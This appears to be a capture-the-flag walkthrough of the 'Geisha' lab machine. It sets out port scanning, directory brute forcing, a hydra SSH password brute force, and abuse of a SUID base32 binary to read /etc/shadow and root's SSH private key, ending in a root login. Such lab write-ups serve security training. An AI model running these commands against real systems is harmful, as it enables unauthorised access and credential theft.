Geisha
Nmap
sudo nmap 192.168.152.82 -p- -sS -sV
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
7080/tcp open ssl/empowerid LiteSpeed
7125/tcp open http nginx 1.17.10
8088/tcp open http LiteSpeed httpd
9198/tcp filtered unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
This one is a little bit tricky as we have multiple web servers which all appear to land us on the same page:

I put all the web server ports and addresses into a text file called list.txt and used dirsearch.py
to run through each target.
python3 dirsearch.py -l list.txt -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 60 --full-url
After some time we get an interesting hit on port 7125.

I browsed to the URL and downloaded passwd.

From this we do know the user geisha exists on the system and can start to brute force the user. Running hydra against SSH
we soon get a valid hit.
hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.152.82

We now have SSH
access as the user.

As per usual I transferred over linpeas
to the machine and after running we have identified the SUID bit being set on the base32 binary.

According to GTFOBins we can take advantage of this to perform privileged file reads.

Initially I used this to read the /etc/shadow file. However, I was unable to crack the password with rockyou.txt.

Now we could use this to read the proof.txt flag but, we are not really done until we gain a root shell. I decided to have a stab at the root account having a id_rsa key.
/usr/bin/base32 /root/.ssh/id_rsa | base32 --decode

I then transferred the key over to my attacking machine and used chmod
to set appropriate permissions.
chmod 600 id_rsa
Then used the id_rsa key to connect in as root on SSH.
ssh -i id_rsa root@192.168.152.82

Last updated